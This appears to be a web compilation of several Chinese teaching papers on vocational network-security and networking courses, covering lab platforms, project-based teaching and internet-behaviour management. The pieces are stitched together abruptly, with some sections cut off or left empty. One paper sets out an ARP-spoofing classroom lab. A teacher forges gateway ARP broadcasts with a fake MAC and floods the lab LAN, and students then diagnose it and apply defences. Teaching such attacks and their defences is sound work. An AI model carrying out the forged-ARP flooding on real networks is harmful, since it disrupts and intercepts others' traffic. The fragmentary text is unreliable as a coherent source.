時間:2022-11-30 17:00:52
開篇:寫作不僅是一種記錄,更是一種創造,它讓我們能夠捕捉那些稍縱即逝的靈感,將它們永久地定格在紙上。下面是小編精心整理的12篇網絡安全實訓總結,希望這些內容能成為您創作過程中的良師益友,陪伴您不斷探索和進步。
1.1校企共建實訓教材
職業院校的培養目標是技能型應用人才。通過和企業合作可以加強學生的就業能力,首先對企業進行調查研究,針對企業網絡對人才的應用需求,依照企業崗位所要求的職業技能,與企業共建實訓教材。要參照國家相關的職業資格標準,改革課程項目實訓的教學內容,實現企業和學院共同編寫實訓教材的方案[3]107-108。我們編寫的校本實訓教材適合學生的水平和需求,不但提高了學生學習興趣,而且讓他們從實踐中提高了網絡技術實際應用能力。
1.2搭建實訓虛擬平臺
網絡技術專業課程原理較多并且設置復雜,如果單純地使用裸機和真實設備來配置,不僅不能滿足需求,而且設備昂貴,易于損壞。項目實訓實驗結合企業網絡工程項目,按照企業網絡實施流程來完成案例[4]25-27。實訓中采用Windows Server、Linux和GNS3軟件和ASA防火墻等模擬路由器和防火墻,讓虛擬機和真實機橋接。該仿真平臺使教師教學方式靈活,學生不但易于理解和實現,而且調動了學生的學習積極性。使用虛擬機軟件VMware練習操作系統的安裝、設置和維護,避免因學生的誤操作對系統造成損壞使實訓終止。它能幫助學生順利地在計算機上安裝操作系統,完成修改和設置而不影響真機的正常運作。使用模擬軟件進行路由器和交換機的配置,實現真實的網絡環境,讓學生能夠在模擬軟件中體會到路由器、交換機在企業網絡環境中的具體應用和配置,為以后的網絡安全管理工作奠定基礎。
1.3企業案例實訓
案例實訓是在實踐中學習,將所學知識應用在實驗中。通過對案例的學習,學生可以掌握Windows Server、Linux操作系統的安裝、設置、維護和管理,學會橋架、管線、機柜和六大子系統的綜合布線,熟悉交換機、路由器、防火墻和無線AP等的配置管理。企業案例的選取來源于企業,學生根據實訓的目標,采取小組討論選取組長、資料查閱記錄、流程實施和報告撰寫等形式完成實訓任務。教師在施工現場有選擇地指導,由小組長答辯,教師根據實訓中出現的問題進行解答,最后評定實訓成績。企業案例實訓培養了學生的職業技能。在項目實訓中,從網絡環境構建、操作系統設置、網絡設備安裝、網絡設備安全配置到安全測試驗證,一整套的項目實訓下來,學生獲取工作中有用的知識,教學中做到知識訓練與實際工程項目職業能力銜接,為職業院校提供新的實踐教學模式。網絡設備的安全技術內容也是一個重要的實踐內容,讓實踐教學充分體現職業教育的特點。
1.4企業頂崗實訓
1學生頂崗實訓
首先完成章節項目的實訓,章節項目的實訓是小案例實訓,結合每一章節的具體內容來實施。其首先使用模擬軟件來模擬,然后用虛擬機安裝相應的軟件來實施網絡操作系統設置、交換機、路由器和防火墻安全案例。對于Windows Server的高級設置和維護、Linux的安全管理、ACL配置、NAT和防火墻等技術,講解時要精講,項目案例實訓時要精練。其次完成綜合項目的實訓。綜合實訓是在本課程全部完成后進行,根據企業網絡實際需求搭建安全和便于管理的網絡。模擬企業網絡環境,組建企業網絡,進行網絡操作系統搭建、網絡環境的構建和網絡安全技術的技能訓練。通過項目綜合實訓學習,學生能夠根據企業辦公環境、需要的信息點數量以及網絡拓撲圖進行綜合布線,安裝和設置操作系統,配置交換機、路由器和防火墻安全設備,使用管理軟件監控企業網絡的運行狀態,并采取安全技術保證企業網絡的安全,使其正常運作。最后是頂崗實訓,安排學生到企業進行實訓,切實感受真實網絡環境,發現網絡安全隱患,掌握網絡操作技術、網絡設備配置技術和網絡安全管理技術,提高處理網絡故障的實際能力。項目實訓的成績考核方式要靈活,將企業和學校雙方結合,給學生以中肯的評價,以能力為主,為學生就業打下堅實的基礎。
2教師頂崗實訓
深入企業第一線,了解企業網絡所需要的工作崗位和技術能力,全面跟蹤學習綜合布線、網絡應用操作、網絡安全管理和網絡云計算服務等方面的技術崗位;然后反饋到網絡技術專業教學實踐改革中,更新校企共建實訓教材,將企業中的新知識、新技術和新的管理理念引入,做好與企業網絡技術人員的良好溝通,豐富實訓教材內容,提高教學質量。
2總結
關鍵詞:網絡安全;實驗教學;教學設計;教學手段
中圖分類號:TP393 文獻標識碼:A 文章編號:1009-3044(2016)31-0107-03
1 引言
網絡安全課程本身原理部分晦澀難以理解,實驗部分涉及技術眾多,涵蓋多個專業課程的知識點,因此也是一門與其他學科交叉性極強的實踐性課程。根據學科特點和崗位能力培養目標,從基本學情出發,研究設計了符合教學目標和學生認知特點的教學方案,有效完成了教學任務,提高了學生的學習能力
2 教學基本情況分析
網絡的便捷帶給用戶很多網絡使用效率的困擾,包括帶寬擁塞、關鍵應用的服務質量QoS無法保障、病毒請求消耗帶寬、網絡攻擊導致服務中斷等問題。上網行為管理作為網絡安全管理的重要內容,能夠實施內容審計、行為監控與行為管理,同時可以動態靈活控制網絡速率和流量帶寬,很好地滿足各行業網絡安全管理的需要。
同時,上網行為管理也是計算機技術專業的“網絡安全與運維”典型工作任務中的一個技術技能訓練單元。在專業職業崗位需求分析的基礎上確定了本實訓單元的技術技能訓練要求。課程內容根據《網絡安全與防護》課程標準中制定,同時參考了神州數碼網絡安全崗位認證系列教材的相關內容。我們依據技術技能人才培養方案,立足地區網絡安全管理人才需求,結合學院現有設備優勢,將實訓的內容設計為上網行為管理的基本概念、常用設備及架構、校園網絡上網行為管理的規劃與實施、上網行為管理的日常運維與分析四個部分[2]。
教學對象是高職高專二年級學生,已經具備計算機網絡基礎知識、路由與交換、局域網組建等相關知識和技術技能。但尚未達到網絡安全運維的實踐能力要求,隱形知識也有待顯化。從往屆生的學習情況來看,課后對知識的復習鞏固性練習積極性不高。尤其是對動手配置的內容,很多同學只能按照教材按部就班地進行,不善于思考,只限于對配置操作的記憶。因此結合技術技能人才培養要求,我們以職業技能訓練和崗位能力培養為教學組織原則,結合案例分析、實際操作、模擬現場、課后實踐等多種方式進行實踐內容教學,充分利用實訓室現有網絡設備和各類信息化教學平臺和手段,突出“以學生為主體”和“學做合一”的特點,完成本次教學任務。
基于以上分析,教學目標確定為三方面。首先是知識目標。要求學生掌握上網行為管理的基本概念,熟悉上網行為管理常用設備,了解此類設備的關鍵技術,熟悉上網行為管理常用架構。二是技能目標,學生能夠規劃校園網絡上網行為管理方案,能夠實施上網行為管理方案,能夠對常見設備進行運維管理及分析。三是素養目標方面,希望學生具備安全操作意識,有用良好合作協調能力、自我學習能力和創新和應變能力[3]。
3 教學設計
3.1 課前活動
為了培養學生的自我學習和自我管理能力,同時利用網絡教學平臺突破空間限制,擴展師生互動范圍,提升學生個性化和差異化的學習體驗。教師會在課前上傳課前任務書、學習資源、考核標準到超星網絡教學平臺,并通過該平臺預學習任務;同時,通過超星移動APP、QQ群、微信預習通知;教師收到學生的課前測驗結果后,及時批改測驗結果,了解不同學生的認知基礎的差異,靈活調整課堂教學策略,適當調整教學方法。學生收到預習通知后查看任務書;針對本單元中用到的各類硬件設備,提前調研其性能及技術參數;同時學生可以利用實驗室的環境設備進行安全的探索操作;完成課前預習報告后學生提交到超星網絡教學平臺并在平臺上獨立完成課前評價表的填寫。
3.2 課堂活動
課堂教學部分,教師首先創設教學情境,設計出三個教學活動,引導學生分組討論,完成實驗環境的搭建,從而引出本單元學習內容;然后教師利用奧易課堂教學軟件下發任務書,并做出簡要說明。在學生完成過程中針對個別學生的提問做差異化指導,通過奧易教學軟件統一監控。最后教師引導學生總結歸納本單元課堂教學的主要內容和實驗思路、故障分析解決思路。
與此同時學生要完成一下工作。首先針對創設情境,分組討論、展開頭腦風暴并總結表述討論結果,復習已有知識技能,獨立完成實驗環境的搭建;其次結合下發的任務書,組員間討論分析項目的需求,檢查項目實施的環境及準備工作是否完整。然后討論制定項目計劃,確定項目實施的方案;第三觀看教學視頻,獨立完成9個任務的實施和驗證;第四針對拓展任務,分組討論,分析問題,提出解決方案,給出實施計劃,確定實施方案;第五劃分不同角色,組員間協作完成拓展任務的實施和驗證;拓展任務結束后,其中一組簡要匯報任務的完成情況,由師生對其共同點評;接下來學生結合教師給出的新的網絡場景,分析總結出常見上網行為管理時有可能出現的網絡問題,以及常見的分析和解決方法;最后獨立完成課堂評價表的填寫。
3.3 課后活動
關鍵詞:ARP欺騙攻擊;網絡安全意識;問題情境;職業素質
中圖分類號:TP393 文獻標識碼:A 文章編號:1009-3044(2015)35-0100-03
Abstract: This paper aims to integrate the network safety consciousness, real problem situation, professional quality concept into the college experimental teaching process under the strategy of network power, to stimulate students' enthusiasm and initiative, and guide students to find, analyze and solve the problem, to sum up the experiment in the form of lists. Ultimately, the "student oriented, supplemented by teachers" teaching ideas are reflected, and students' practical ability are enhanced.
Key words: ARP spoofing;network safety consciousness; problem situation; professional quality
1 引言
2014年來,中央網絡安全和信息化領導小組組長多次提出了“沒有網絡安全就沒有國家安全”以及“建設網絡強國”的重要論斷。2015年政府工作報告提出的“互聯網+行動計劃” 體現出信息化對網絡發展巨大推動作用和以網絡為載體的數據驅動巨大魅力的同時,也呼喚著人們通過網絡的進一步發展來不斷提升網絡安全的能力和意識。兩屆國家網絡安全宣傳周活動的開展也為加強全民網絡安全宣傳教育、提升網民的網絡安全防范意識和技能提供了良好的途徑。
網絡安全上升到國家戰略層面,各類網絡攻擊和竊取事件的頻發驅動信息安全需求急劇增加,目前網絡安全普遍存在的問題是信息安全意識不強、缺乏整體安全方案、沒有安全管理機制、系統本身不安全以及缺少必要的安全專才。
網絡安全意識比技術更重要。作為培養網絡專業技能人才的一線高校教師,在平常實驗教學中除了借助各種安全設備和環境完成實訓內容外,更重要的是提升學生的安全意識和處理安全事故的能力,在提高專業技能水平的同時培養學生的職業素質,因此設計好網絡安全實驗課程顯得尤為重要。本文以ARP欺騙攻擊與防范實驗教學為例,探索在真實網絡安全情境下,新型安全課程實驗教學模式的改革以及教學效果。
2 ARP欺騙攻擊原理
ARP協議是以太網等數據鏈路層的基礎協議,負責完成IP地址到硬件地址的映射。工作過程簡述如下:1)當主機或者網絡設備需要解析一個IP地址對應的MAC地址時,會廣播發送ARP請求報文。2)主機或者網絡設備接收到ARP請求后,會進行應答。同時,根據請求發送者的IP地址和MAC地址的對應關系建立ARP表項。3)發起請求的主機或者網絡設備接收到應答后,同樣會將應答報文中發送者的IP地址和MAC地址的映射關系記錄下來,生成ARP表項。從ARP工作機制可以看出,ARP協議簡單易用,但是卻沒有任何安全機制,攻擊者可以發送偽造ARP報文對網絡進行攻擊。偽造ARP報文具有如下特點:偽造的ARP報文中源MAC地址/目的MAC地址和以太網幀封裝中的源MAC地址/目的MAC地址不一致;偽造的ARP報文中源IP地址和源MAC地址的映射關系不是合法用戶真實的映射關系。目前主要的ARP攻擊方式有如下幾類:仿冒網關攻擊、仿冒用戶攻擊(欺騙網關或者其他主機)、泛洪攻擊。
3 問題情境設計
教學情境是課堂教學的基本要素,有價值的教學情境一定是內含問題的情境,它能有效地引發學生的思考。問題情境的創設,對于學生學習興趣的激發起著決定作用。因此,如何設計具有一定情緒色彩的、以形象為主體的生動具體的場景,以激發學生一定的情感,就成為教學之初需要考慮的問題。
在一個沒有防御的園區網中爆發的ARP病毒會造成網絡丟包、不能訪問網關、IP地址沖突等問題,實驗室所有主機分配的是同一網段IP地址,接入交換機,預先在教師機上開啟Sniffer嗅探者軟件,運行數據包發生器,修改后的ARP廣播報文會持續被發送到當前局域網中,為學生建立一個真實園區網面臨的問題情境,接下來引導學生按照“發現問題-分析問題-解決問題”的順序完成實驗內容,提升自己的安全意識和實踐能力。
4 實施過程
4.1 實驗環境
實驗室所有主機處于同一網段,類似如下所示的拓撲圖環境:
4.2 問題情境的構造
教師機IP地址為172.16.75.105,在本實驗中充當攻擊者身份。首先構造用于攻擊的ARP欺騙報文,在Sniffer軟件上定義好過濾器后,開始捕獲報文,首先將教師機的ARP緩存清空,嘗試PING網關,停止捕獲并顯示結果如下圖所示,
發送當前的幀之前做如下修改:(1)更改源IP地址為網關IP地址;(2)更改源MAC地址為偽造的MAC 地址11-22-33-44-55-66;(3)更改目的IP地址為任一同網段主機IP地址;(4)更改目的MAC地址為全F值。設置為連續不斷地發送幀,啟動數據幀發生器,此時當前網段會充斥著此類ARP廣播報文。
4.3 問題情境的呈現
以4-5人為一組,以真實的網絡管理員遇到的企業局域網故障為案例,向學生說明經常受到的網絡攻擊來自于網絡內部,表現為訪問互聯網時斷時續,打開網頁或下載文件的速度明顯變慢,甚至無法訪問公司的Web服務器等資源,嚴重影響了企業辦公業務的正常運行,公司領導對此很不滿意,要求立刻徹底解決問題。要求在實驗報告上完成每步測試內容并填寫檢查結果。此環節注重引入職業教育理念,既要注重技能鍛煉,又要注意素質培養。立足本職崗位,敢于承擔責任,從工作中發現問題是什么,為什么到怎么做,同時培養學生的團隊意識。
4.4發現問題
此環節旨在讓學生運用已掌握的網絡維護技能發現當前局域網存在的問題,通過觀察學生在測試環節中采用的方法,可以了解到學生能否快速有效地定位網絡中的故障,在不投入新的設備情況下解決問題。
通過觀察,多數學生會按照如下測試步驟檢測網絡狀況:1)檢查本機網絡連接情況及IP地址是否有效;2)檢查與同一網段內其余主機連接情況;3)檢查與網關連接情況;4)檢查與DNS服務器連接情況;5)檢查與Web服務器連接情況。這一過程旨在幫助學生基于收集到的測試數據判斷問題癥結點的能力,只有在充分調查研究的基礎上具體問題具體分析,才能把存在的問題癥結點找準、找實、找透,才能開對方子,做到對癥下藥。
4.5分析問題
根據課堂反映來看,絕大多數學生在實施到第3步時發現PING網關IP地址不通,并且重啟機器后癥狀依舊,沒過多久又會產生丟包現象。不少學生通過使用ARP -a命令發現學習到的網關MAC地址是偽造的11-22-33-44-55-66,進而判斷出問題在于網關MAC地址被篡改,通過使用Sniffer軟件,可以嗅探到局域網內充斥著大量的ARP報文,并且通過抓包分析,發現源IP地址為172.16.75.254的網關的MAC地址為11-22-33-44-55-66。此時需要引導學生去思考兩個問題:一是為什么主機會無條件更新,二是如何防范此類錯誤。結合課本上提到的TCP/IP協議棧的脆弱性,部分同學會得出主機并不對收到的ARP報文進行檢查,從而導致PC主機更新本機ARP緩存里的網關MAC地址的結論。
這個分析問題的過程注重培養學生遇到問題的應變能力,這種能力的訓練對于今后可能從事的網絡運維崗位而言,是非常有必要的。
4.6 解決問題
明白了問題的原因,如何解決問題就是一個水到渠成的過程。通過幾分鐘分組討論的形式,最后總結了幾組的意見,歸納出兩種解決思路:一是主機對于收到的ARP偽造報文不進行更新操作,二是限制此類ARP廣播報文在局域網內的泛洪。此時,結合實訓指導書內容,教師提出兩種解決方案讓學生選擇,一是在局域網內各臺主機上靜態綁定正確的網關MAC地址,這樣即使主機收到了虛假MAC地址也不予以更新;二是在交換機各端口上設置單位時間內允許通過的ARP報文數量的閾值,超過閾值則關閉端口。同時讓學生分組討論,對這兩種方案的優缺點進行比較,最終得出如下的結論,方案一因為要在局域網內每臺主機上配置命令,工作量較大,網關MAC地址一旦改變又得重新配置,而且治標不治本,不能有效遏制網段內ARP報文造成的廣播風暴,網絡傳輸性能較低;方案二只需在交換機端口上進行配置,與網關MAC地址無關,如果再在端口上劃分好VLAN,將會進一步限制廣播報文的傳輸范圍。
4.7 實驗總結
總結既是自己對于實驗的理解歸納,也是對整個實驗過程的回放,既要總結有所收獲的地方,也要歸納出不足之處。通過將實驗全過程中涉及現象、情境及步驟列成問題清單,讓每位學生都能從實驗中總結出得與失。最后借鑒翻轉課堂的思想,邀請一位學生就實驗目的、方法、步驟進行口頭陳述,由其余學生進行補充,從而獲得更深層次的理解。
5 結語
通過網絡安全實驗課程的教學嘗試,以及學生的反映來看,收到了一定成效。總結起來達到了三個目的,一是探索網絡安全意識、網絡安全技能并重的新型網絡安全實驗教學方法,二是引導學生進入實際問題情境中,深入角色,積極主動地去發現、分析及解決問題,三是將個人責任感、團隊合作等職業化素質理念融入到教學過程當中,培養主人公意識。在教學過程中需要注意對于課堂進度以及時間的把握,如學生遇到難點應及時進行引導,推動進程。
參考文獻:
[1] 遲恩宇,劉天飛,楊建毅,王東.網絡安全與防護[M].電子工業出版社,2009.
[2] 葉成緒.校園網中基于ARP協議的欺騙及其預防[J].青海大學學報: 自然科學版,2007(3):59-61.
[3] 秦豐林,段海新,郭汝廷.ARP欺騙的監測與防范技術綜述[J].計算機應用研究,2009(1):30-33.
[4] 孟令健.計算機網絡安全ARP攻擊行為的防范研究[J].齊齊哈爾大學學報: 自然科學版,2013(3):9-11.
[5] 郭會茹,楊斌,牛立全.ARP攻擊原理分析及其安全防范措施[J].網絡安全技術與應用,2015(6):5-6.
[6] 劉名卓,趙娜.網絡教學設計樣式的研究與實踐[J].遠程教育雜志,2013(3):79-86.
摘 要:針對當前計算機網絡教學和目前中等職業技術學校計算教學的現狀,結合當前計算機網絡技術的發展和實際狀況,結合中等職業技術學校的學生特點,綜合網絡實際使用和培訓的狀況,對計算機網絡教學進行詳細的分析和研究,嘗試尋找到一條適合中職計算機網絡教學方式,行成一套行之有效的教學方法。關鍵詞:中職計算機教育 計算機網絡技術 網絡教學中圖分類號:G712
文獻標識碼:A
文章編號:1672-3791(2013)07(b)-0181-01現代社會的網絡技術已經成為了人們日常生活的重要組成部分,隨著網絡技術的發展和變革,社會和工作與網絡技術的關聯性越來越頻繁,越來越不可或缺。無論是在企業還是在家庭,生活的每一個環節現在都在利用日益發展的網絡技術進行連接。從簡單的網站建設到復雜的物流網,數據庫管理,都與網絡技術息息相關。針對如此高速發展的網絡技術產業,催生了大量的網絡技術人才的需求,同時對網絡技術的專業人才要求也提出了很高的要求。在中等職業技術教育的課堂上,計算網絡作為一門非常具有實用性的課程,已然已經成為非常重要的一個學科。因此,對該課程的教學工作也提出了很高的要求。本論文就計算機網絡實際操作的教學內容,教學計劃和教學方法進行了了研究和討論。1 計算機網絡實踐教學的教學大綱與教學計劃為了讓學生綜合利用所學的網絡知識,擁有一些解決實際問題的能力,能夠完成一些簡單的網絡管理、組建、維護等工作,中等職業技術教學中設計了計算機網絡課程,同時也對網絡知識的基本了解和基本設置了一些教學任務。應對網絡在日常工作和生活中的應用、網絡技術的發展、網絡應用中常出現的問題的解決方法,讓學生對網絡環境的現狀和基本的問題做出準確判斷,制訂出符合學生實際能力的教學大綱。對學生的實際網絡基礎知識的能力評估后,針對職業技術學校學生實際的基礎水平,因人而異的設計一個側重于學生實際操作能力培養和鍛煉的教學計劃,重點鍛煉學生在實際環境中對網絡技術的應用。2 計算機網絡實踐教學的內容2.1 基礎網絡知識實訓基礎實訓的主要目的是培訓學生掌握基本網絡組建的能力,通過培訓,要求學生能夠掌握基礎網絡組建和實施的能力,能夠獨立完成基礎的小型局域網絡的構建并對構建的網絡進行驗證,對出現的問題能夠有解決方案。實訓內容包括:ADSL撥號上網的設置、制作雙絞線(直通線和交叉線)、設置多臺PC共享上網、配置WIFI路由器、基礎交換機的配置、基礎路由器配置、交換機的級聯和鏈路聚合配置、使用交換機劃分VLAN等。通過這些實訓,要求學生能夠獨立操作構建一個小型綜合性網絡環境,從設計、布線、配置到檢查糾錯的全過程,掌握一個較為全面的基礎網絡設置能力。2.2 網絡管理實訓管理類實訓的目的是培養學生管理網絡的方法和技術,使其在未來的工作中擁有這方面的能力。這實訓主要內容包括有:使用工具軟件分析網絡數據、學習掌握端口和MAC地址的綁定的知識、了解交換機的端口鏡像、了解虛擬專用網VPN的配置、學習IP地址的配置規劃、掌握基于802.1x的配置方法、了解網絡帶寬的監控維護等。通過這些實訓,使學生基本掌握針對網絡設備的管理、故障處理、性能管理、網絡認證和費用管理等方面的能力,能夠進行初步的網絡管理工作。2.3 網絡綜合能力實訓綜合類實訓的目的:提高對網絡綜合應用能力,使學生部分滿足較為復雜的網絡環境的工作。這方面的實訓主要有:樹協議的啟用方法、三層交換機的VLAN配置、配置ACL訪問控制列表、靜態路由配置、動態路由RIP配置、動態路由OSPF配置、利用單臂路由配置VLAN間互訪等,這一部分為實訓為更高級別的網絡知識培訓,對那些有一定興趣且基礎比較扎實的學生,通過這部分的實訓可以學習并掌握更加大范圍的網絡環境的知識,能夠掌握大型網絡的建網和配置的方法。2.4 網絡安全實訓這類實訓的目的:通過實訓,使學生能夠在防止網絡侵入、網絡攻擊等方面掌握一定的專業能力,能夠通過網絡安全的配置和對設備的理解應對一般的網絡攻擊行為。實訓內容包括:網絡行為策略配置、網絡監聽、操作系統安全配置、防火墻的透明模式和NET配置、數據備份與恢復等。通過此類實訓,使學生掌握一定的網絡安全相關技能。網絡安全是整個網絡技術的最頂端的技術,對于中職的教學,要求學生以了解和開闊視野為目的,初步了解網絡安全方面的知識。3 網絡技術實踐教學法對于計算機網絡教學,如何提高學生對該課程的興趣是教學的最基本技巧。教學方法的重要性就體現在如何在枯燥的教學中找到興趣點,給學生提高成就感。基于上述的要求,我總結了以下幾個教學方法。3.1 項目教學法在課堂上提出一個網絡構建的項目,讓學生以小組為單位完成整個網絡環境的設計,規劃,配置和檢查。給學生創造一個項目成功的成就感,同時加深對所學知識的掌握程度。3.2 示范教學法老師直接向學生展示一個復雜的網絡配置中使用到的技巧和方法,讓學生充分認識到網絡技術的千變萬化,提高學生深入學習的興趣。3.3 網絡教學法讓學生帶著問題去網絡中尋找他們想要找到的解答方法,通過網絡學習網絡知識,讓學生了解最新最前端的網絡知識,以此來彌補課本上沒有提及的最新資訊和學習內容。在實際教學中,需要結合多種教學方法,以教學方法為項目教學法,項目是學會使用互聯網。實訓項目教學突的關鍵是培養學生獨立思考問題、解決問題的能力。因此在實訓中,要重點在這方面加強輔導和培養。這樣的實訓教學可以提高學生掌握知識的,切實提高學生對該課程知識的掌握,提高他們進入社會和工作崗位后的工作能力。4 結語計算機技術的快速發展,對計算網絡教學提出了更高的要求。教師在教學中必須在深入了解社會和企業的實際需求情況下,結合學生的特點進行更加側重于實際操作的教學,讓學生在實訓中發現問題,分析問題并且解決問題。教師在整個教學過程中更多的應該扮演一個引導、傾聽、引導和觀察的角色,以學生自己的思想作為學習的基本中心思想來學習。讓學生充分感受的“今天所學、明天所用”的學以致用的思想。學生在這樣的思想驅動下子讓可以很快的提高學習的興趣,做到自主學習,并且在走出校門踏上工作崗位后可以快速融入崗位。參考文獻[1] 計算機網絡[M].清華大學出版社,2008.[2] 孫憲君,呂濱.計算機網絡操作系統原理與應用[M].機械工業出版社,2006.
【關鍵詞】項目化教學;計算機網絡技術;項目設計;應用
一、項目化教學法的含義
項目教學法是師生通過共同實施一個完整的項目工作而進行的教學活動。即以項目為載體,以工作任務為中心,行為導向為方法,以能力培養為目標,旨在將課堂教學與工作情境完美地結合起來,讓學生融入更有意義的工作任務中,通過任務的完成,讓學生自主學習、自我提高,實現知識的積累、能力的提高和素質的培養。其目的在于加強課程內容與工作之間的相關性,整合理論與實踐,提高學生技能培養的效率。
二、《計算機網絡技術》課程教學目標
本課程的教學目標是使學生掌握計算機網絡基礎理論及網絡組建技術,掌握目前應用最廣泛的TCP/IP協議的基本知識,會組建小型局域網,會安裝、配置常用的網絡服務,能為各種常用的網絡服務提供技術支持,能管理小型網絡,對在網絡運行過程中出現的故障進行排除和解決,能保證網絡安全穩定的運行。要想實現這一教學目標,必須深化改革,采用有效的教學方法——項目化教學,讓學生在項目學習中具備局域網組網與管理的能力。
三、《計算機網絡技術》課程采用項目教學法的必要性
(1)目前在計算機網絡技術課程教學中存在理論和實踐相脫節的現象。教學內容理論性太強,一般教師在講授計算機網絡課程時更多的是采用傳統教育管理和教學模式。首先,對計算機網絡的概念、發展、硬件組成等內容進行介紹;其次,介紹OSI七層模型、TCP/IP 協議、各種網絡的功能;最后,介紹網絡的應用與網絡安全的防范等知識。這種傳統的教學模式看起來教師已經把計算機網絡知識全部傳授給了學生,但對于學生來說如何管理和維護一個網絡仍無從下手,學生對計算機網絡的認識只停留在書本上。(2)教學手段和方法單一,教學效果不好。教師在講授計算機網絡課程的過程中,最容易犯的毛病就是“滿堂灌”。內容理論性強,相對枯燥,學生看不到又摸不著,很快會對計算機網絡從感興趣到失去興趣,這會直接導致學生上課走神、不聽課、教學互動差,達不到教學效果。針對平時教學中存在的問題,我們進行教學改革,改革教學手段和教學方法,把項目教學法引入網絡技術課堂中,可大大地激發學生的學習熱情,使理論學習與崗位實踐需求統一起來。
四、項目教學法在《計算機網絡技術》課程中的實踐應用
(1)項目設計。項目教學法是師生通過共同實施一個完整的項目工作而進行的教學活動。首先要設計典型、實用的項目。按照教學內容的需求,結合網絡真實的市場需求及學校的實際情況,選取現實的對象、材料為項目,項目既要包含基本的教學知識點,又能調動學生解決問題的積極性,還便于學生對知識的遷移和融會貫通。如組建一個小型局域網絡這一項目,主要是培養學生組建網絡、管理網絡的能力,要求學生通過項目實訓熟悉網絡工程的實施流程和方案設計方法,完成小型家庭辦公網絡的構建。根據這一過程,可將其分成7個子項目:小型局域網的需求分析及可行性論證;小型局域網網絡規劃;組網設備及預算;網絡施工(虛擬網絡環境/架設部分網絡);接入Internet;網絡安全與管理;簽合同及技術文檔。(2)項目實訓內容。為實現各個子項目,我們將每個子項目劃分為若干個任務。如小型局域網需求分析及可行性論證需掌握網絡的基本理論知識,網絡系統組成、網絡分類、傳輸介質、網絡通信協議、網絡操作系統及網絡安全等知識,此項目要求學生根據客戶需求,靈活運用網絡知識設計網絡方案。小型局域網網絡規劃包括使用Visio軟件繪制網絡拓撲圖、思科模擬器(Packet Tracer)的安裝及使用、根據實際需要布線。組網設備及預算包括雙絞線的制作、光纖熔接。網絡施工(虛擬網絡環境/架設部分網絡)包括Virtual PC安裝、服務器端及客戶機端操作系統安裝、雙機互聯、多機互聯、IP設置及劃分、交換機的基本配置及級聯、劃分VLAN、使用路由器的基本配置、網絡資源共享。架設網絡服務包括Active Directory安裝與配置、DNS安裝與配置、DHCP安裝與配置、WWW服務器的安裝與配置、FTP服務器的安裝與配置、郵件服務器的安裝與配置六個任務。接入Internet包括常用的局域網接入Internet方法:ADSL接入方式、“光纖+LAN”的因特網接入、無線接入方式(組建Ad-hoc模式網絡、組建Infrastructure模式網絡)。局域網共享Internet連接(文件共享和打印機共享),還會涉及網絡命令及網絡故障診斷實訓內容。網絡安全與管理包括系統自帶的安全管理工具、計算機網絡安全措施兩個任務。這方面的實訓主要有:使用抓包工具軟件分析網絡數據、交換機的端口鏡像、端口和MAC 地址的綁定、服務配置、網絡帶寬的監控維護等。簽合同及技術文檔,讓學生了解合同的使用方法及注意事項。(3)項目實施。一是創設教學情境。項目教學法主要是以項目引領,任務驅動貫穿整個教學。教師要創設與教學內容相關的教學情境,引出項目后應適時以恰當的形式告之學生具體而明確的學習目標和任務,分析出教材中的重點、難點,提煉出教材中的要點,精心編寫一些典型的。把理論講解和技能訓練統一安排,把老師活動和學生活動統一安排,把教學過程和自主學習統一安排。二是改革教學手段和教學方法。《計算機網絡技術》是一門理論性和實踐性都很強的課程,要使項目教學法成效顯著,必須重視網絡實訓環境的建設,有相應的硬件設備和軟件配置,保證大部分項目實訓能夠實現。對于某些不能實現的子項目要安裝模擬軟件、建立虛擬實驗室和參觀校園網絡建設來達到目的。還要將多種現代化教學手段引入課堂。教學方法多樣化,如類比教學方法,把網絡中一些枯燥、抽象的計的概念用實際生活中人們熟悉的事物與理論進行類比,幫助學生直觀、形象地理解和掌握計算機網絡理論知識,使抽象、神秘的問題變得通俗易懂。(4)項目評價。學生學習的效果直接由完成項目的情況來衡量,先是對學生參與的學習成果進行評價。各單項任務的完成情況,這些項目任務能體現本門課程的知識和技能。如繪制實訓室網絡拓撲圖;雙絞線制作;雙機互連的完成情況。然后教師再根據學生參與項目教學的態度和創造性,解決實踐中問題的能力,評判學生的自學能力與解決問題的能力。完成任務過程中的態度、表現,還從另一個側面反映學生的綜合素質,只要項目任務設計適當,考核方式合適,就能很好地調動學生自主學習的積極性,較好地實現課程的教學目標。可包括教師評價、學習小組評價和自評三部分。除了對學生的學習項目完成情況進行評價外,教師還應在教學項目完成后及時進行總結反思,對項目教學過程中出現的問題及考核過程中出現的問題進行細致分析和研究,及時完善項目內容及考核方法,為下次教學積累經驗。
五、結語
《計算機網絡技術》課程是內容多,范圍廣,知識更新快,且理論性和實踐性都很強。作為教師,我們必須緊貼網絡實際情況,設計典型實用的項目,從真實的網絡應用入手講解網絡的組建、應用、管理和維護,提高學生分析問題、動手能力和解決實際問題的能力。只要把項目教學法用好用活,學生就會感到學這門課程是非常有用的,會積極地投入到項目學習中去,更好地實現既定的教學目標。
參 考 文 獻
關鍵詞 說課 信息安全 教學 課程
中圖分類號:G424 文獻標識碼:A
0 引言
本課程為信息安全專業職業崗位課程,服務于高職高專人才培養規劃,堅持以行動任務為導向,工學結合培養為主線的人才培養模式。培養學生從事網絡安全方案設計、網絡操作系統安全部署、網絡維護、信息安全管理等相關工作。本文從課程定位與目標、課程設計、教學內容和組織、教學組織與實施、實踐條件與教學效果、教學隊伍、教學改革與特色創新七個方面對課程進行詳細的闡述,對教學理念進行符合高職教學規律的深層次的梳理。
1 課程定位與目標
1.1 崗位需求(如圖1)
1.2 課程定位
信息安全基礎是高職高專3年制信息安全專業的一門必修職業基礎課程,一般安排在第一學期開設,在專業課程體系中起著引領專業課程體系的作用,其后續課程為安全防護工具、服務器安全防護和防火墻配置應用。
1.3 課程學習目標
(1)學習能力目標。通過本課程的學習,進一步培養學生的自主學習能力,掌握網絡安全防護的基本過程和方法。
(2)職業能力目標。了解我國網絡安全狀況和相應的政策和法律法規,熟悉網絡安全防護項目的實施過程和要領,能夠熟練進行客戶機和服務器加固操作,能夠設計和實施中小型網絡的安全防護方案,了解大型網絡安全防護方案的設計與實施要領。
(3)職業素養目標。通過項目設計培養學生的統籌規劃能力和工程文檔編寫能力,通過項目合作培養學生的團隊合作意識和能力。
2 課程設計
